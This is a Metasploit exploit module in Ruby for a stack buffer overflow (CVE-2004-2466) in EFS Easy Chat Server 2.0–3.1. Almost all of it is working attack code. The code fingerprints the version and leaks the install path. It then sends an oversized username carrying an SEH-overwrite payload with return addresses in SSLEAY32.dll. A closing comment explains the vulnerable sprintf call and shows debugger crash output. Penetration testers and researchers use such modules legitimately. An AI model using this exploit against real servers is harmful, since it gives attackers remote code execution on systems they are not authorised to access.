165 lines
4.9 KiB
Ruby
165 lines
4.9 KiB
Ruby
##
|
|
# This module requires Metasploit: https://metasploit.com/download
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
##
|
|
|
|
class MetasploitModule < Msf::Exploit::Remote
|
|
Rank = GreatRanking
|
|
|
|
HttpFingerprint = { :pattern => [ /Easy Chat Server\/1\.0/ ] }
|
|
|
|
include Msf::Exploit::Remote::HttpClient
|
|
include Msf::Exploit::Remote::Seh
|
|
|
|
def initialize(info = {})
|
|
super(update_info(info,
|
|
'Name' => 'EFS Easy Chat Server Authentication Request Handling Buffer Overflow',
|
|
'Description' => %q{
|
|
This module exploits a stack buffer overflow in EFS Software Easy Chat
|
|
Server versions 2.0 to 3.1. By sending an overly long authentication
|
|
request, an attacker may be able to execute arbitrary code.
|
|
},
|
|
'Author' =>
|
|
[
|
|
'LSO <lso[at]hushmail.com>', # original metasploit
|
|
'Brendan Coles <bcoles[at]gmail.com>' # metasploit
|
|
],
|
|
'License' => BSD_LICENSE,
|
|
'References' =>
|
|
[
|
|
[ 'CVE', '2004-2466' ],
|
|
[ 'OSVDB', '7416' ],
|
|
[ 'OSVDB', '106841' ],
|
|
[ 'BID', '25328' ]
|
|
],
|
|
'DefaultOptions' =>
|
|
{
|
|
'EXITFUNC' => 'process',
|
|
},
|
|
'Privileged' => false,
|
|
'Payload' =>
|
|
{
|
|
'Space' => 7000,
|
|
'BadChars' => "\x00\x0a\x0b\x0d\x0f\x20\x25\x26",
|
|
'StackAdjustment' => -3500,
|
|
},
|
|
'Platform' => 'win',
|
|
'Targets' =>
|
|
[
|
|
# Tested on Easy Chat Server v2.0, 2.1, 2.2, 2.5, 3.1 on:
|
|
# -- Windows XP SP 3 (x86) (EN)
|
|
# -- Windows 7 SP 1 (x64) (EN)
|
|
# -- Windows 8 SP 0 (x64) (EN)
|
|
[ 'Automatic Targeting', { 'auto' => true } ],
|
|
# p/p/r SSLEAY32.dll
|
|
[ 'Easy Chat Server 2.0', { 'Ret' => 0x10010E2E } ],
|
|
# p/p/r SSLEAY32.dll
|
|
[ 'Easy Chat Server 2.1 - 3.1', { 'Ret' => 0x1001071E } ]
|
|
],
|
|
'DisclosureDate' => 'Aug 14 2007',
|
|
'DefaultTarget' => 0))
|
|
end
|
|
|
|
def check
|
|
version = get_version
|
|
if not version
|
|
return Exploit::CheckCode::Safe
|
|
end
|
|
vprint_status "Found version: #{version}"
|
|
if version !~ /^(2\.\d|3\.0|3\.1)$/
|
|
return Exploit::CheckCode::Safe
|
|
end
|
|
path = get_install_path
|
|
if not path
|
|
return Exploit::CheckCode::Detected
|
|
end
|
|
vprint_status "Found path: #{path}"
|
|
return Exploit::CheckCode::Appears
|
|
end
|
|
|
|
#
|
|
# Get software version from change log
|
|
#
|
|
def get_version
|
|
res = send_request_raw 'uri' => '/whatsnew.txt'
|
|
if res and res.body =~ /What's new in Easy Chat Server V(\d\.\d)/
|
|
return "#{$1}"
|
|
end
|
|
end
|
|
|
|
#
|
|
# Get software installation path from uninstall file
|
|
#
|
|
def get_install_path
|
|
res = send_request_raw 'uri' => '/unins000.dat'
|
|
if res and res.body =~ /([A-Z]:\\[^\x00]{2,256})?\\[a-z]+\.htm/i
|
|
return "#{$1}"
|
|
end
|
|
end
|
|
|
|
def exploit
|
|
|
|
# get target
|
|
if target.name =~ /Automatic/
|
|
version = get_version
|
|
vprint_status "Found version: #{version}" if version
|
|
if not version or version !~ /^(2\.\d|3\.0|3\.1)$/
|
|
fail_with(Failure::NoTarget, "#{peer} - Unable to automatically detect a target")
|
|
elsif version =~ /(2\.0)/
|
|
my_target = targets[1]
|
|
elsif version =~ /(2\.\d|3\.0|3\.1)/
|
|
my_target = targets[2]
|
|
end
|
|
else
|
|
my_target = target
|
|
end
|
|
|
|
# get install path
|
|
path = get_install_path
|
|
if not path
|
|
fail_with(Failure::UnexpectedReply, "#{peer} - Could not retrieve install path")
|
|
end
|
|
path << "\\users\\"
|
|
vprint_status "Using path: #{path}"
|
|
|
|
# send payload
|
|
sploit = rand_text_alpha(256 - path.length)
|
|
sploit << generate_seh_payload(my_target.ret)
|
|
print_status "Sending request (#{sploit.length} bytes) to target (#{my_target.name})"
|
|
send_request_cgi({
|
|
'uri' => '/chat.ghp',
|
|
'encode_params' => false,
|
|
'vars_get' => {
|
|
'username' => sploit,
|
|
'password' => rand_text_alphanumeric(rand(10) + 1),
|
|
'room' => 1,
|
|
'sex' => rand_text_numeric(1)
|
|
}
|
|
}, 5)
|
|
|
|
end
|
|
end
|
|
|
|
=begin
|
|
|
|
0x004144C8 calls sprintf with the following arguments:
|
|
sprintf(&FileName, "%susers\\%s", path, username);
|
|
|
|
Since we can make the username larger than the allocated buffer size
|
|
we end up overwriting SEH with a PPR from SSLEAY32.dll and nSEH with
|
|
a short jmp to the beginning of our shellcode.
|
|
|
|
(46c.144): Access violation - code c0000005 (first chance)
|
|
First chance exceptions are reported before any exception handling.
|
|
This exception may be expected and handled.
|
|
eax=ffffffff ebx=000007f6 ecx=0047fd50 edx=41414141 esi=000007ef edi=0047a3ea
|
|
eip=00445f34 esp=01216b88 ebp=01216ba0 iopl=0 nv up ei pl nz na po nc
|
|
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
|
|
EasyChat+0x45f34:
|
|
00445f34 8a02 mov al,byte ptr [edx] ds:0023:41414141=??
|
|
|
|
0:005> !exchain
|
|
01216dd8: 41414141
|
|
Invalid exception stack at 41414141
|
|
=end
|